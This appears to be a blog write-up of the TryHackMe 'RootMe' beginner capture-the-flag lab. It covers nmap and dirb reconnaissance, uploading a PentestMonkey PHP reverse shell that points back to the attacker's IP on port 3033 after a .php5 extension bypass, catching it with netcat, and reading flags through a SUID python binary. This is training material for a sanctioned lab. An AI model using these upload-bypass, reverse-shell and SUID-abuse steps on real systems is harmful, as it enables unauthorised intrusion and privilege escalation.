THM — RootMe

Beginner’s CTF on TryHackMe

Reconnaissance:

nmap -sV -vv 10.10.x.xStarting Nmap 7.60 ( https://nmap.org ) at 2021-08-29 20:05 BST
NSE: Loaded 42 scripts for scanning.
Initiating ARP Ping Scan at 20:05
Scanning 10.10.x.x [1 port]
Completed ARP Ping Scan at 20:05, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:05
Completed Parallel DNS resolution of 1 host. at 20:05, 0.00s elapsed
Initiating SYN Stealth Scan at 20:05
Scanning ip-10-10-x-x.eu-west-1.compute.internal (10.10.x.x) [1000 ports]
Discovered open port 80/tcp on 10.10.x.x
Discovered open port 22/tcp on 10.10.x.x

Completed SYN Stealth Scan at 20:05, 1.27s elapsed (1000 total ports)
Initiating Service scan at 20:05
Scanning 2 services on ip-10-10-x-x.eu-west-1.compute.internal (10.10.x.x)
Completed Service scan at 20:05, 6.03s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.x.x.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 20:05
Completed NSE at 20:05, 0.02s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 20:05
Completed NSE at 20:05, 0.00s elapsed
Nmap scan report for ip-10-10-x-x.eu-west-1.compute.internal (10.10.x.x)
Host is up, received arp-response (0.0012s latency).
Scanned at 2021-08-29 20:05:05 BST for 8s
Not shown: 998 closed ports
Reason: 998 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.29 ((Ubuntu))

MAC Address: 02:CE:49:01:F0:BF (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds
Raw packets sent: 1002 (44.072KB) | Rcvd: 1002 (40.076KB)

Nmap scan results gives us two ports open. From here we can try to examine the Apache server on port 80.

We can run dirb to try to find directories.

dirb http://10.10.x.x-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Aug 29 20:05:42 2021
URL_BASE: http://10.10.x.x/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------GENERATED WORDS: 4612---- Scanning URL: http://10.10.x.x/ ----
==> DIRECTORY: http://10.10.x.x/css/
+ http://10.10.x.x/index.php (CODE:200|SIZE:616)
==> DIRECTORY: http://10.10.x.x/js/
==> DIRECTORY: http://10.10.x.x/panel/
+ http://10.10.x.x/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://10.10.x.x/uploads/

---- Entering directory: http://10.10.x.x/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.x.x/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.x.x/panel/ ----
+ http://10.10.x.x/panel/index.php (CODE:200|SIZE:732)

---- Entering directory: http://10.10.x.x/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Aug 29 20:05:49 2021
DOWNLOADED: 9224 - FOUND: 3

We find two directories of interest: /panel/ and /uploads/ to explore.

Getting a Shell:

We utilize a reverse shell payload from PenTest Monkey, and change the paramters to point back to our machine.

$ip = '10.x.x.x';  // CHANGE THIS$port = 3033;       // CHANGE THIS

When we first attempt to upload the shell we receive an error, we then try changing the extension to .php5 and our file is uploaded successfully. Prior to executing our payload we set up a listener on the 3033 port, which will connect once we run our code. Heading to the /uploads we see our payload is there. Clicking on the payload allows for the code to run and for our listener to connect.

nc -lvnp 3033 
Listening on [0.0.0.0] (family 0, port 3033)
Connection from 10.10.x.x 33822 received!
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

Once we are connected we can search for our flag and view the contents

find / -name 'user.txt' 2>/dev/null
/var/www/user.txt

Privilege Escalation:

find / -perm -u=s -type f 2>/dev/null

We find an interesting file at /usr/bin/python. We attempted to do the SUID exploit but it didnt work out so we used the file read to view our file.

Knowing that we can abuse python, we use GTFOBins File Read Python to view our flag

python -c 'print(open("/path/to/file").read())'

--

--

cyber security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store